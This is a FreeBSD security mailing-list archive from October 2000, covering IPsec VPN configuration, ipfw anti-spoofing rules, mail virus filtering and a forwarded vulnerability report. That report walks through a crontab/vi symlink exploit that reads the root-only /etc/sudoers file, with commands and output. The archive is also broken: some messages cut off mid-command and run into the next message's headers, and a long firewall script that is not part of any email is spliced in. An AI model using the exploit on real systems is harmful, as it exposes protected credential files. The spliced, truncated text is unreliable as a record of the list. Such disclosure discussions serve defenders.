Received: from thunder.venux.net (net-216-93-125-061.hcv.com [216.93.125.61]) by icebox.venux.net (Postfix) with ESMTP id C73EC26209 for ; Wed, 25 Oct 2000 18:43:50 -0400 (EDT)
Message-Id: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net>
X-Sender: mhagerty@pop3.venux.net
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Wed, 25 Oct 2000 18:33:55 -0400
To: freebsd-security@FreeBSD.ORG
From: Matthew Hagerty
Subject: IPsec requires FreeBSD-4.??
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Greetings,

I am trying desperately to get a simple network-to-network VPN working with FreeBSD. I am having no luck and would like to know what version of 4.x I need? I am currently using 4.0 release on both sides. Is that going to work or do I need to upgrade to 4.1.1 or something?

Also, while I'm here, this is the whole procedure I'm using (that does not seem to be working.) Is there something wrong with this?

In the kernel I added these and recompiled:

options IPSEC
options IPSEC_ESP

Then I modified the IPv4 tunnel example in the handbook (the example as written did not work either... long lines wrap)

10.0.0.0/24--24.7.242.61<------->216.93.125.61--10.0.1.0/24

setkey -c <

; Wed, 25 Oct 2000 16:45:17 -0700 (PDT)
Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.1/8.9.3) with ESMTP id e9PNjh922232; Wed, 25 Oct 2000 19:45:52 -0400 (EDT) (envelope-from mike@sentex.net)
Message-Id: <4.2.2.20001025194015.04b93008@mail.sentex.net>
X-Sender: mdtancsa@mail.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Wed, 25 Oct 2000 19:44:58 -0400
To: Matthew Hagerty , freebsd-security@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: IPsec requires FreeBSD-4.??
In-Reply-To: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 06:33 PM 10/25/2000 -0400, Matthew Hagerty wrote:
>Greetings,
>
>I am trying desperately to get a simple network-to-network VPN working
>with FreeBSD. I am having no luck and would like to know what version of
>4.x I need? I am currently using 4.0 release on both sides. Is that
>going to work or do I need to upgrade to 4.1.1 or something?

It certainly is easier with 4.1.1 as you can use the racoon port. Here is a quick sample config that will work with racoon out of the box.

This assumed that 172.16.1.1 and 192.168.1.1 are your public NON RFC 1918 space that is publicly routed.

#!/bin/sh
#Ottawa config
ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias
gifconfig gif0 172.16.1.1 192.168.1.1
ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0
setkey -FP
setkey -F
setkey -c <

>Also, while I'm here, this is the whole procedure I'm using (that does not
>seem to be working.) Is there something wrong with this?
>
>In the kernel I added these and recompiled:
>
>options IPSEC
>options IPSEC_ESP

Looks good to me.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Wed Oct 25 21:20:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtprelay3.abs.adelphia.net (unknown [64.8.20.11]) by hub.freebsd.org (Postfix) with ESMTP id CA0CF37B479 for ; Wed, 25 Oct 2000 21:20:18 -0700 (PDT)
Received: from warpig ([24.48.166.41]) by smtprelay3.abs.adelphia.net (Netscape Messaging Server 4.15) with SMTP id G30S0F00.DMT; Thu, 26 Oct 2000 00:19:27 -0400
Message-ID: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net>
From: "Andrew Penniman"
To: "Mike Hoskins" ,
References:
Subject: Re: request for example rc.firewall script
Date: Thu, 26 Oct 2000 00:34:57 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Tue, 24 Oct 2000, Crist J . Clark wrote:
>
> > > check-state
> > > allow ip from a.b.c.d to any keep-state
> > > allow ip from x.y.z.z/24 to any keep-state
> > Eep! You've left yourself _very_ vulnerable to spoofing.
>
> From the internal net you mean? If so, I agree. Given I'm the only
> person using my 'LAN', I've accepted that as a liveable risk. ;)

The spoofing threat is external. An evil bad person could spoof your external IP and have full access to your services by the first rule. They could do the same by spoofing any of the x.y.z.z/24 addresses.

Why would your external IP be talking to the internal system? I think I'd get rid of that rule completely.

To prevent spoofing on the x.y.z.z/24 network, add the following rule to prevent x.y.z.z/24 sourced traffic coming into the machine from the outside world:

deny ip from x.y.z.z/24 to any via xx0 in

where xx0 is your external interface.

No?

From owner-freebsd-security Wed Oct 25 23:37:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 7631A37B479 for ; Wed, 25 Oct 2000 23:37:45 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 25 Oct 2000 23:36:05 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9Q6bIh30185; Wed, 25 Oct 2000 23:37:18 -0700 (PDT) (envelope-from cjc)
Date: Wed, 25 Oct 2000 23:37:17 -0700
From: "Crist J . Clark"
To: Andrew Penniman
Cc: Mike Hoskins , freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
Message-ID: <20001025233717.Y75251@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net>; from apenniman@adelphia.net on Thu, Oct 26, 2000 at 12:34:57AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Oct 26, 2000 at 12:34:57AM -0400, Andrew Penniman wrote:
> > On Tue, 24 Oct 2000, Crist J . Clark wrote:
> >
> > > > check-state
> > > > allow ip from a.b.c.d to any keep-state
> > > > allow ip from x.y.z.z/24 to any keep-state
> > > Eep! You've left yourself _very_ vulnerable to spoofing.
> >
> > From the internal net you mean? If so, I agree. Given I'm the only
> > person using my 'LAN', I've accepted that as a liveable risk. ;)
>
> The spoofing threat is external. An evil bad person could spoof your
> external IP and have full access to your services by the first rule. They
> could do the same by spoofing any of the x.y.z.z/24 addresses.
>
> Why would your external IP be talking to the internal system? I think I'd
> get rid of that rule completely.
>
> To prevent spoofing on the x.y.z.z/24 network, add the following rule to
> prevent x.y.z.z/24 sourced traffic coming into the machine from the outside
> world:
>
> deny ip from x.y.z.z/24 to any via xx0 in
>
> where xx0 is your external interface.
>
> No?

I think,

allow ip from a.b.c.d to any keep-state out
allow ip from x.y.z.z/24 to any keep-state in via yy0

Where yy0 is the internal interface, is better. Go for the explicit pass, default deny.

--
Crist J. Clark
cjclark@alum.mit.edu

From owner-freebsd-security Thu Oct 26 2:40:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id 9310037B4C5 for ; Thu, 26 Oct 2000 02:40:54 -0700 (PDT)
Received: by snafu.adept.org (Postfix, from userid 1000) id DE2A19EE01; Thu, 26 Oct 2000 02:40:30 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id DC20B9B001; Thu, 26 Oct 2000 02:40:30 -0700 (PDT)
Date: Thu, 26 Oct 2000 02:40:30 -0700 (PDT)
From: Mike Hoskins
To: cjclark@alum.mit.edu
Cc: Andrew Penniman , freebsd-security@FreeBSD.ORG
Subject: Re: request for example rc.firewall script
In-Reply-To: <20001025233717.Y75251@149.211.6.64.reflexcom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 25 Oct 2000, Crist J . Clark wrote:

> > To prevent spoofing on the x.y.z.z/24 network, add the following rule to
> > prevent x.y.z.z/24 sourced traffic coming into the machine from the outside
> > world:
> >
> > deny ip from x.y.z.z/24 to any via xx0 in

That's rule 65535. ;)

> allow ip from a.b.c.d to any keep-state out
> allow ip from x.y.z.z/24 to any keep-state in via yy0
> Where yy0 is the internal interface, is better. Go for the explicit
> pass, default deny.

Thanks, this is what I needed. I'd submitted my rules for inspection before without much feedback; I'm glad this came up again. :)

-mrh

From owner-freebsd-security Thu Oct 26 4:28:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from server.osny.com.br (osny.com.br [200.215.110.57]) by hub.freebsd.org (Postfix) with ESMTP id 0E3CD37B479 for ; Thu, 26 Oct 2000 04:28:30 -0700 (PDT)
Received: from osny.com.br ([172.20.185.22]) by server.osny.com.br (8.10.1/8.10.1) with ESMTP id e9QBU6l10124 for ; Thu, 26 Oct 2000 09:30:08 -0200 (EDT)
Message-ID: <39F7FAD8.2140D3F2@osny.com.br>
Date: Thu, 26 Oct 2000 09:35:20 +0000
From: Michelangelo Pisa
Organization: Agencia Maritima Osny
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: out of domain
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello!

My Procmail is used to filter mail on my Intranet; that works, but if I receive mail from another server or domain it has no effect: the virus comes through unfiltered. Could it be my sendmail.cf configuration ?
Thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 5: 3:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id D63A137B4C5 for ; Thu, 26 Oct 2000 05:03:30 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13olka-0008UE-00; Thu, 26 Oct 2000 14:03:16 +0200 Date: Thu, 26 Oct 2000 14:03:16 +0200 (IST) From: Roman Shterenzon To: Michelangelo Pisa Cc: freebsd-security@FreeBSD.ORG Subject: Re: out of domain In-Reply-To: <39F7FAD8.2140D3F2@osny.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Oct 2000, Michelangelo Pisa wrote: > > Hello! > > > My Procmail is used to filter mails in my Intranet, it's ok, but > if I receive some mail of the other server or domain It don't had > effect, the virus come normal, not filtered, Maybe, can be my > sendmail.cf configuration ? I once used FEATURE(mailertable) and uucp-domain hooks to filter that. uux reference in configuration was replaced with a simple script that done virus-checking and then reinjected it. Beware of mail loops though. I'm pretty sure there're better ways of doing it. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ]

From owner-freebsd-security Thu Oct 26 5:36:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gwdu42.gwdg.de (gwdu42.gwdg.de [134.76.10.26]) by hub.freebsd.org (Postfix) with ESMTP id 41A2737B479 for ; Thu, 26 Oct 2000 05:36:45 -0700 (PDT)
Received: from gwdu20.gwdg.de ([134.76.98.2] ident=kheuer) by gwdu42.gwdg.de with smtp (Exim 3.14 #18) id 13omGg-0005h9-00 for freebsd-security@freebsd.org; Thu, 26 Oct 2000 14:36:26 +0200
Received: from localhost by gwdu20.gwdg.de (5.65v4.0/1.1.10.5/11Feb98-0154PM) id AA28315; Thu, 26 Oct 2000 14:36:25 +0200
Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST)
From: Konrad Heuer
To: freebsd-security@freebsd.org
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd)
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D; it seems to depend on the way vi stores edit info in /tmp. The exploit does not work with emacs, e.g.

I removed the suid bit of crontab as a workaround. It's not possible for a user to modify files owned by someone else in this way.

Regards
K.
Heuer (kheuer@gwdg.de) ---------- Forwarded message ---------- Date: Wed, 25 Oct 2000 12:30:47 +0200 From: "Fabio Pietrosanti (naif)" Reply-To: naif@inet.it To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST) Resent-From: Eckhard Handke Resent-To: Konrad Heuer Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Tested also on: FreeBSD 3.3 = Vulnerable FreeBSD 2.2.8 = Vulnerable Aix 4.2 = Not Vulnerable Linux Slackware 7.0 = Not Vulnerable Linux Slackware 4.0 = Not Vulnerable naif On Tue, 24 Oct 2000, Sergey Nenashev wrote: > Hi, > > Tested on > 4.0-RELEASE FreeBSD 4.0-RELEASE #9 > 4.1-RELEASE FreeBSD 4.1-RELEASE #1: > > > Can read any file wich start with comment simbol (#) > > > > $ ls -l /etc/sudoers > -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers > $ id > uid=1002(alf) gid=1002(alf) groups=1002(alf) > > > $ crontab -e > ~ > ~ > ~ > /tmp/crontab.hLmjTbK417 > :!sh > > [ #### Make simbolik link] > > rm /tmp/crontab.hLmjTbK417 > > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417 > > exit > > [ #### quit vi ] > /tmp/crontab.hLmjTbK417 > crontab: installing new crontab > > [ #### start crontab editor] > > $ crontab -e > [####### See in vi] > # sudoers file. > # > # This file MUST be edited with the 'visudo' command as root. > # > # See the sudoers man page for the details on how to write a sudoers > file. 
> # > > # Host alias specification > > # User alias specification > > # Cmnd alias specification > > # User privilege specification > root ALL=(ALL) ALL > alf ALL=(ALL) ALL > ~ > ~ > ~ > > > > > If file started with no # then crontab sad > > "/tmp/crontab.GAeNMP1357":2: bad minute > crontab: errors in crontab file, can't install > > > > > -- > ------ > Alf Delems > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 16:59: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx2.roble.com [206.40.34.15]) by hub.freebsd.org (Postfix) with ESMTP id 74E7A37B479 for ; Thu, 26 Oct 2000 16:58:56 -0700 (PDT) Received: from localhost (marquis@localhost) by roble.com with ESMTP id e9QNwtU21687 for ; Thu, 26 Oct 2000 16:58:55 -0700 (PDT) Date: Thu, 26 Oct 2000 16:58:55 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: request for example rc.firewall script In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Brezny [mailto:peter@sysadmin-inc.com] wrote: > I'm working on adding the rules needed to rc.firewall under the 'simple' > sections to allow the script to function as a firewall/nat router for a > small network with private ip's in the 10.x.x.x range. You may or may not want to use the rc.firewall scripts directly. We more often roll our own, as a matter of due diligence, and use rc.local to call a script like the following. 
#!/bin/sh -
/sbin/ipfw -q flush

## outgoing
/sbin/ipfw add 110 allow ip from 10.1.1.0/24 to any via ed2
/sbin/ipfw add 110 allow ip from 204.69.218.85/32 to any via ed1

## localhost
/sbin/ipfw add 120 allow all from any to any via lo0
/sbin/ipfw add 121 deny ip from any to 127.0.0.0/8
/sbin/ipfw add 122 deny ip from 127.0.0.0/8 to any

## netbios
/sbin/ipfw add 130 deny udp from any to any 135-139
/sbin/ipfw add 130 deny tcp from any to any 135-139

###############################################################
BLKHL=/usr/local/etc/blackhole_ips
if [ -s $BLKHL ]; then
  for ip in `egrep -v '(^$|^#)' $BLKHL` ; do
    /sbin/ipfw add 1000 deny ip from $ip to any
  done
else
  echo "ERROR: $BLKHL not found"
fi
###############################################################

## rfc1918
/sbin/ipfw add 8998 deny ip from 10.0.0.0/8 to any
/sbin/ipfw add 8998 deny ip from 172.16.0.0/12 to any
/sbin/ipfw add 8998 deny ip from 192.168.0.0/16 to any
/sbin/ipfw add 8998 deny ip from 128.0.0.0/16 to any

## ip-options (per FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options)
/sbin/ipfw add 9000 deny log ip from any to any ipoptions ssrr,lsrr,ts,rr

## icmp types
/sbin/ipfw add 9800 allow icmp from any to any icmptypes 0,3,4,8,11
/sbin/ipfw add 9900 deny log icmp from any to any

## kernel default = allow

This, however, lacks some filters recommended by other organizations (for the IOS/PIX literate):

Recommended by SANS:

access-list 150 deny ip 0.0.0.0 0.255.255.255 any
access-list 150 deny ip 10.0.0.0 0.255.255.255 any
access-list 150 deny ip 127.0.0.0 0.255.255.255 any
access-list 150 deny ip 169.254.0.0 0.0.255.255 any
access-list 150 deny ip 172.16.0.0 0.15.255.255 any
access-list 150 deny ip 192.0.2.0 0.0.0.255 any
access-list 150 deny ip 192.168.0.0 0.0.255.255 any
access-list 150 deny ip 224.0.0.0 15.255.255.255 any
access-list 150 deny ip 240.0.0.0 7.255.255.255 any
access-list 150 deny ip 248.0.0.0 7.255.255.255 any
access-list 150 deny ip 255.255.255.255 0.0.0.0 any

Recommended by Paul Vixie:

access-list 100 deny ip host 0.0.0.0 any
access-list 100 deny ip 127.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255
access-list 100 deny ip 10.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255
access-list 100 deny ip 172.16.0.0 0.15.255.255 255.240.0.0 0.15.255.255
access-list 100 deny ip 192.168.0.0 0.0.255.255 255.255.0.0 0.0.255.255
access-list 100 deny ip 192.0.2.0 0.0.0.255 255.255.255.0 0.0.0.255
access-list 100 deny ip 128.0.0.0 0.0.255.255 255.255.0.0 0.0.255.255
access-list 100 deny ip 191.255.0.0 0.0.255.255 255.255.0.0 0.0.255.255
access-list 100 deny ip 192.0.0.0 0.0.0.255 255.255.255.0 0.0.0.255
access-list 100 deny ip 223.255.255.0 0.0.0.255 255.255.255.0 0.0.0.255
access-list 100 deny ip 224.0.0.0 31.255.255.255 224.0.0.0 31.255.255.255
access-list 100 deny ip any 255.255.255.128 0.0.0.127
access-list 100 permit ip any any

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Thu Oct 26 19:15:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id D963737B4CF for ; Thu, 26 Oct 2000 19:15:39 -0700 (PDT)
Received: (qmail 10489 invoked by uid 0); 27 Oct 2000 02:15:38 -0000
Received: from p3ee2160d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.13) by mail.gmx.net with SMTP; 27 Oct 2000 02:15:38 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id XAA23115 for freebsd-security@FreeBSD.org; Thu, 26 Oct 2000 23:51:37 +0200
Date: Thu, 26 Oct 2000 23:51:37 +0200
From: Gerhard Sittig
To: freebsd-security@FreeBSD.org
Subject: Re: ports/22316: [PATCH] samba port in a jail(2) environment
Message-ID: <20001026235137.Y25237@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.org
References: <20001026205458.U25237@speedy.gsinet> <200010261920.MAA92910@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200010261920.MAA92910@freefall.freebsd.org>; from gnats-admin@FreeBSD.org on Thu, Oct 26, 2000 at 12:20:02PM -0700 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is not really a security related posting in its strict sense. But I understand that security aware admins will most probably experience the same problem since it's bound to employing jail(2) - and of course FreeBSD for the important machines :) - for public and internal servers. That's why I would like to attract your attention, direct it towards http://www.freebsd.org/cgi/query-pr.cgi?pr=22316 and invite you to discuss the topic -- preferrably via PM or as a f'up to the PR, definitely not in the -security list unless it's plain wrong from a security POV what I did there to "solve" the problem. Unfortunately I'm not subscribed to -ports nor do I enjoy searching the lists via the web interface (there are soo many checkboxes for the many lists and I don't want to check too many to avoid false positives) -- this means searching does happen as problems arise, but not on a regular basis for casual reading. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. 
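The rc.firewall discussion above (Andrew Penniman's rule against x.y.z.z/24 arriving on the outside interface, Crist Clark's "explicit pass, default deny", and Roger Marquis's script with its blackhole_ips list and the SANS reserved-source list) describes a ruleset rather than showing a complete one. The following is an added example, not Roger Marquis's script, rc.firewall, or anything from the FreeBSD tree: it emits the ipfw commands for such a ruleset so they can be reviewed before being piped into sh, and it validates every entry of the blackhole file first, since a stray token in that file would otherwise either abort the script or quietly leave a hole. Interface names, addresses and the sample blackhole entries are constructed; the ipfw syntax used is the one that appears in the thread.

```shell
#!/bin/sh
# Added example (not from the thread): generate an ipfw ruleset that applies
# the thread's anti-spoofing advice and validates a blackhole_ips file before
# turning it into rules.  Output is a list of ipfw commands for review;
# pipe it into sh once it looks right.  Names and addresses are constructed.

IPFW=${IPFW:-/sbin/ipfw -q}

# Source prefixes that should never arrive from the Internet (the SANS list
# quoted in the thread; 240.0.0.0/4 covers its 240/5 and 248/5 entries and
# the limited-broadcast address).
BOGONS='0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
        192.0.2.0/24 192.168.0.0/16 224.0.0.0/4 240.0.0.0/4'

# valid_cidr ADDR[/PREFIX]: true for a well-formed dotted-quad IPv4 address
# or CIDR block, false for anything ipfw would reject.
valid_cidr() {
    cidr=$1
    addr=${cidr%%/*}
    case $cidr in */*) prefix=${cidr#*/} ;; *) prefix=32 ;; esac
    case $prefix in ''|*[!0-9]*) return 1 ;; esac
    [ "$prefix" -le 32 ] || return 1
    case $addr in .*|*.|*..*) return 1 ;; esac
    old_ifs=$IFS; IFS=.; set -- $addr; IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# antispoof_rules EXT_IF EXT_IP INT_IF INT_NET: the core of the ruleset.
antispoof_rules() {
    ext=$1; ext_ip=$2; int=$3; net=$4
    printf '%s add 50 allow ip from any to any via lo0\n' "$IPFW"
    # Our own prefix arriving on the outside interface can only be spoofed.
    printf '%s add 100 deny log ip from %s to any in via %s\n' "$IPFW" "$net" "$ext"
    # Reserved and unroutable sources from the outside.
    for b in $BOGONS; do
        printf '%s add 200 deny ip from %s to any in via %s\n' "$IPFW" "$b" "$ext"
    done
    # Explicit pass: state is created only by the firewall's own outbound
    # traffic and by traffic entering from the inside.
    printf '%s add 300 check-state\n' "$IPFW"
    printf '%s add 400 allow ip from %s to any keep-state out via %s\n' "$IPFW" "$ext_ip" "$ext"
    printf '%s add 410 allow ip from %s to any keep-state in via %s\n' "$IPFW" "$net" "$int"
    # Explicit default deny instead of relying on the kernel default.
    printf '%s add 65000 deny log ip from any to any\n' "$IPFW"
}

# blackhole_rules FILE: one deny rule per entry.  Blank lines and '#'
# comments are skipped; malformed entries are reported and make the function
# fail instead of silently producing a ruleset with holes.
blackhole_rules() {
    bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        entry=$(printf '%s' "${line%%#*}" | tr -d ' \t')
        [ -n "$entry" ] || continue
        if valid_cidr "$entry"; then
            printf '%s add 1000 deny ip from %s to any\n' "$IPFW" "$entry"
        else
            printf 'blackhole: malformed entry "%s" ignored\n' "$line" >&2
            bad=$((bad + 1))
        fi
    done < "$1"
    [ "$bad" -eq 0 ]
}

# build_ruleset EXT_IF EXT_IP INT_IF INT_NET BLACKHOLE_FILE
build_ruleset() {
    printf '%s flush\n' "$IPFW"
    antispoof_rules "$1" "$2" "$3" "$4"
    blackhole_rules "$5"
}

# Stand-alone use (constructed values):
#   sh build_ipfw.sh fxp0 203.0.113.1 fxp1 10.1.1.0/24 /usr/local/etc/blackhole_ips
if [ $# -eq 5 ]; then
    build_ruleset "$@"
fi
```

Rule numbers order the result regardless of the order in which the functions print them, so the blackhole entries at 1000 sit after the anti-spoofing denies and before the final deny. A non-zero exit from build_ruleset means the blackhole file needs fixing; nothing has been loaded at that point because the output was only text.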
From owner-freebsd-security Thu Oct 26 20:44: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail3.mx.voyager.net (unknown [216.93.66.202]) by hub.freebsd.org (Postfix) with ESMTP id 9EB9037B479 for ; Thu, 26 Oct 2000 20:44:05 -0700 (PDT)
Received: from thunder.voyager.net (net-216-93-125-061.hcv.com [216.93.125.61]) by mail3.mx.voyager.net (8.10.2/8.10.2) with ESMTP id e9R3i2423576; Thu, 26 Oct 2000 23:44:02 -0400 (EDT)
Message-Id: <5.0.0.25.2.20001026234133.02b0bc30@pop.voyager.net>
X-Sender: mhagerty@pop.voyager.net
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Thu, 26 Oct 2000 23:43:59 -0400
To: Mike Tancsa , Matthew Hagerty , freebsd-security@FreeBSD.ORG
From: Matthew Hagerty
Subject: Re: IPsec requires FreeBSD-4.??
In-Reply-To: <4.2.2.20001025194015.04b93008@mail.sentex.net>
References: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks for the info; however, I am still not having any luck. Should the configuration you give below work if NAT is taking place on this machine as well? Also, are there any pointers as to how I can troubleshoot this problem, check where the communication stops, etc.?

Thanks,
Matthew

At 07:44 PM 10/25/00 -0400, Mike Tancsa wrote:
>At 06:33 PM 10/25/2000 -0400, Matthew Hagerty wrote:
>>Greetings,
>>
>>I am trying desperately to get a simple network-to-network VPN working
>>with FreeBSD. I am having no luck and would like to know what version of
>>4.x I need? I am currently using 4.0 release on both sides. Is that
>>going to work or do I need to upgrade to 4.1.1 or something?
>
>It certainly is easier with 4.1.1 as you can use the racoon port.
>Here is a quick sample config that will work with racoon out of the box.
>
>This assumed that 172.16.1.1 and 192.168.1.1 are your public NON RFC 1918
>space that is publicly routed.
>
>#!/bin/sh
># Ottawa config
>ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias
>gifconfig gif0 172.16.1.1 192.168.1.1
>ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0
># flush the old policy (SPD) and SA database, then load the new policy
>setkey -FP
>setkey -F
>setkey -c <<EOF
>spdadd 10.1.2.0/24 10.1.1.0/24 any -P out ipsec
>esp/tunnel/172.16.1.1-192.168.1.1/require;
>spdadd 10.1.1.0/24 10.1.2.0/24 any -P in ipsec
>esp/tunnel/192.168.1.1-172.16.1.1/require;
>EOF
>
>#!/bin/sh
># Toronto config
>ifconfig lo0 10.1.1.1 netmask 255.255.255.0 alias
>gifconfig gif0 192.168.1.1 172.16.1.1
>ifconfig gif0 inet 10.1.1.1 10.1.2.1 netmask 255.255.255.0
>setkey -FP
>setkey -F
>setkey -c <<EOF
>spdadd 10.1.1.0/24 10.1.2.0/24 any -P out ipsec
>esp/tunnel/192.168.1.1-172.16.1.1/require;
>spdadd 10.1.2.0/24 10.1.1.0/24 any -P in ipsec
>esp/tunnel/172.16.1.1-192.168.1.1/require;
>EOF
>
>And Presto! We have a secure VPN that is tunneled!
>
>Toronto# ping 10.1.2.1
>PING 10.1.2.1 (10.1.2.1): 56 data bytes
>64 bytes from 10.1.2.1: icmp_seq=1 ttl=255 time=1.743 ms
>64 bytes from 10.1.2.1: icmp_seq=2 ttl=255 time=1.746 ms
>64 bytes from 10.1.2.1: icmp_seq=3 ttl=255 time=1.739 ms
>64 bytes from 10.1.2.1: icmp_seq=4 ttl=255 time=1.610 ms
>^C
>--- 10.1.2.1 ping statistics ---
>5 packets transmitted, 4 packets received, 20% packet loss
>round-trip min/avg/max/stddev = 1.610/1.710/1.746/0.058 ms
>
>Toronto# traceroute 10.1.2.1
>traceroute to 10.1.2.1 (10.1.2.1), 30 hops max, 40 byte packets
> 1 10.1.2.1 (10.1.2.1) 1.363 ms 1.222 ms 1.183 ms
>
>Toronto# telnet 10.1.2.1
>Trying 10.1.2.1...
>Connected to 10.1.2.1.
>Escape character is '^]'.
>
>>Also, while I'm here, this is the whole procedure I'm using (that does
>>not seem to be working.) Is there something wrong with this?
>>
